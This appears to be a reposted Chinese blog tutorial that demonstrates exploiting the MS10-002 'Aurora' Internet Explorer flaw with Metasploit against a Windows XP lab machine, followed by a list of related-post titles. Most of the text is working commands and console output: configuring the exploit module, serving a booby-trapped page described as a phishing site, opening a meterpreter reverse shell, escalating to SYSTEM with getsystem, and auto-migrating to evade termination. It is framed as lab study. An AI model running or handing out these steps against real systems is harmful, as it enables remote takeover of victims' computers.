目录

  • 一、MS10_002极光漏洞
  • 二、高级属性

一、MS10_002极光漏洞

本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习

测试环境 描述 ip
主机 kali2020 192.168.1.113
目标主机 win xp sp3 192.168.1.106

①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数

msf6 > search ms10_002Matching Modules
================#  Name                                        Disclosure Date  Rank    Check  Description-  ----                                        ---------------  ----    -----  -----------0  exploit/windows/browser/ms10_002_aurora     2010-01-14       normal  No     MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption1  exploit/windows/browser/ms10_002_ie_object  2010-01-21       normal  No     MS10-002 Microsoft Internet Explorer Object Memory Use-After-FreeInteract with a module by name or index. For example info 1, use 1 or use exploit/windows/browser/ms10_002_ie_objectmsf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/browser/ms10_002_aurora) > optionsModule options (exploit/windows/browser/ms10_002_aurora):Name     Current Setting  Required  Description----     ---------------  --------  -----------SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT  8080             yes       The local port to listen on.SSL      false            no        Negotiate SSL for incoming connectionsSSLCert                   no        Path to a custom SSL certificate (default is randomly generated)URIPATH                   no        The URI to use for this exploit (default is random)Payload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     192.168.1.113    yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----0   Automaticmsf6 exploit(windows/browser/ms10_002_aurora) > set srvport 80
srvport => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > set uripath /
uripath => /msf6 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.1.113:443
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.113:80/
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.

②提示已经在本机80端口开启钓鱼网站,打开靶机的浏览器输入192.168.1.106

③主机成功渗透靶机,获取meterpreter权限

msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.106:4278) at 2021-06-07 13:25:17 +0800msf6 exploit(windows/browser/ms10_002_aurora) > sessionsActive sessions
===============Id  Name  Type                     Information             Connection--  ----  ----                     -----------             ----------1         meterpreter x86/windows  WINXP-1\st21 @ WINXP-1  192.168.1.113:443 -> 192.168.1.106:4278 (192.168.1.106)msf6 exploit(windows/browser/ms10_002_ie_object) > sessions 1
[*] Starting interaction with 1...meterpreter > getuid
Server username: WINXP-1\st21
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

二、高级属性

使用advanced查看高级属性

msf6 exploit(windows/browser/ms10_002_aurora) > advancedModule advanced options (exploit/windows/browser/ms10_002_aurora):Name                    Current Setting  Required  Description----                    ---------------  --------  -----------ContextInformationFile                   no        The information file that contains context informationDisablePayloadHandler   false            no        Disable the handler code for the selected payloadEnableContextEncoding   false            no        Use transient context when encoding payloadsListenerComm                             no        The specific communication channel to use for this serviceSSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"SSLCompression          false            no        Enable SSL/TLS-level compressionSendRobots              false            no        Return a robots.txt file if asked for oneURIHOST                                  no        Host to use in URI (useful for tunnels)URIPORT                                  no        Port to use in URI (useful for tunnels)VERBOSE                 false            no        Enable detailed status messagesWORKSPACE                                no        Specify the workspace for this modulePayload advanced options (windows/meterpreter/reverse_tcp):Name                         Current Setting  Required  Description----                         ---------------  --------  -----------AutoLoadStdapi               true             yes       Automatically load the Stdapi extensionAutoRunScript                                 no        A script to run automatically on session creation.AutoSystemInfo               true             yes       Automatically capture system information on initialization.AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the processAutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in secondsEnableStageEncoding          false            no        Encode the second stage payloadEnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimalHandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored forHTTP transportsInitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.PayloadProcessCommandLine                     no        The displayed command line that will be used by the payloadPayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUIDPayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDsPingbackRetries              0                yes       How many additional successful pingbacksPingbackSleep                30               yes       Time (in seconds) to sleep between pingbacksPrependMigrate               false            yes       Spawns and runs shellcode in new processPrependMigrateProc                            no        Process to spawn and run shellcode inReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOSTReverseListenerBindAddress                    no        The specific IP address to bind to on the local systemReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORTReverseListenerComm                           no        The specific communication channel to use for this listenerReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killedSessionExpirationTimeout     604800           no        The number of seconds before this session should be forciblyshut downSessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failureSessionRetryWait             10               no        Number of seconds to wait between reconnect attemptsStageEncoder                                  no        Encoder to use if EnableStageEncoding is setStageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is setStageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatibleStagerRetryCount             10               no        The number of times the stager should retry if the first connect failsStagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attemptsVERBOSE                      false            no        Enable detailed status messagesWORKSPACE                                     no        Specify the workspace for this module

例如,在连接到目标电脑后迅速迁移到其他进程,防止被杀:

msf6 exploit(windows/browser/ms10_002_aurora) > set autorunscript migrate -f
autorunscript => migrate -f

ms10_002(极光漏洞)渗透步骤——MSF搭建钓鱼网站相关推荐

  1. ms08_067漏洞渗透步骤——MSF

    本文简单介绍了如何使用metasploit针对ms08_067进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192. ...

  2. 基于XP系统IE极光漏洞渗透

    极光漏洞(Aurora)是一个针对IE浏览器的重大漏洞,攻击者向目标发送链接,当IE用户使用IE浏览器点击链接时,就会向攻击者反弹一个可利用的shell,同时会严重占用目标机器的CPU,导致机器卡死. ...

  3. 内网渗透测试 MSF搭建socks代理

    环境搭建: 最终效果为如此,web服务器可以ping通外网和内网两台服务器 外网打点 信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 数据库弱口令 ro ...

  4. Kali Linux 如何搭建钓鱼WIFI(图文炒鸡详细)

    0x00 将网卡切换到监听模式并创建热点 airmon-ng start wlan0 这里是建立监听模式 如果出现wlan0mon则表示成功! 接下来创建热点 airbase-ng -e Free-w ...

  5. 配置域名和服务器-如何搭建个人网站

    步骤 要搭建个人网站,只需三步: 购买域名 购买云服务器 配置域名关联云服务器 购买域名 大家可以在自己信任的网站上购买一个域名 因为小伙伴推荐,我在 GoDaddy 上买了一个域名:wecheris ...

  6. Beef加载msf插件---metasploit对IE浏览器的极光漏洞进行渗透利用

    1.配置文件的修改 输入下列命令,打开配置文件, 在图中所示的地方,作出如下修改 再接着输入以下命令,打开另一个配置文件 注意下图所示的三个地方,以及user和pass 接下来切换到beef主目录之下 ...

  7. 渗透测试之地基服务篇:无线攻防之Kali自搭建钓鱼Wifi

    简介 渗透测试-地基篇 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西. 请注意 : 本文仅用于技术讨论与研究,对于所有 ...

  8. Metasploit 对 IE 浏览器的极光漏洞进行渗透利用

    极光漏洞实际上是利用了堆喷射技术.下面我们来演示渗透过程. 1.查看 win xp 系统状态 目前的cpu和内存消耗极低. 2.在kali linux下利用 metasploit 渗透. msf &g ...

  9. ms10-002“极光漏洞”漏洞复现

    1.漏洞原理 针对Internet Explorer"极光"内存损坏的攻击也就是IE浏览器漏洞,因此该漏洞应当不会受操作系统版本的影响: 2.准备阶段 攻击机:kali(192.1 ...

  10. 使用wifi-pumpkin搭建钓鱼wifi(仅供学习用途)

    实验软件及工具 WiFi-Pumpkin WiFi-Pumpkin是一款专用于无线环境渗透测试的完整框架,利用该工具可以伪造接入点完成中间人攻击,同时也支持一些其他的无线渗透测试功能.旨在提供更安全的 ...

最新文章

  1. tomcat mysql 中文乱码_tomcat 中文乱码, mysql 中文乱码_MySQL
  2. 在 CentOS 8 中删除旧的 Linux 内核
  3. python实习做什么工作-大一/大二学生Python实习的困惑?
  4. Centos sudo添加用户
  5. VS2017 网站打包发布生成的文件中包含.pdb文件,解决办法
  6. leetcood学习笔记-2-两数相加
  7. java0到9的字符怎么表示_java,_java 怎么生成一个0-9,a-z的一个44位字符串作为上传文件的名字,java - phpStudy...
  8. 企业上市上市央企大面积亏损折射出啥弊端?
  9. 【java】swing构件的操作
  10. java类的命名规范_一篇搞定Java命名规范
  11. Django中的 返回json对象的方式
  12. SpringAOP配置与使用(示例)
  13. 马克思主义基本原理【0163】
  14. 论文笔记—RGB-D SLAM in Dynamic Environments Using Static Point Weighting
  15. 信息系统监理师题库_软考信息系统监理师题库
  16. 《计算机是怎样跑起来的》读书笔记
  17. 44道javaScript变态题(上)
  18. 2022-04-24_数组的定义和初始化
  19. 视觉SLAM十四讲 第1-2讲 初识SLAM
  20. 憨猫的EventLoop事件循环小解

热门文章

  1. WIN10 企业版 LTSC 激活
  2. Dev C++项目开发是添加背景音乐 CC++
  3. LM2596S-ADJ DC-DC降压芯片使用
  4. Oracle轻量级客户端下载,Oracle轻量级客户端使用,Oracle轻量级客户端配置,本地同时安装服务器端和客户端,并实现plsql developer连接
  5. 使用js获取移动端设备屏幕高度和宽度尺寸的方法
  6. 质性数据分析软件NVivo的安装选项和参数
  7. 微信小程序实现仿美团外卖饿了么左右联动页面
  8. matlab验证dtft移位性质,7.DTFT的Matlab实现.ppt
  9. 短视频APP系统源码 直播系统源码
  10. 老照片免费修复软件有哪些?一键智能修复老照片工具推荐给你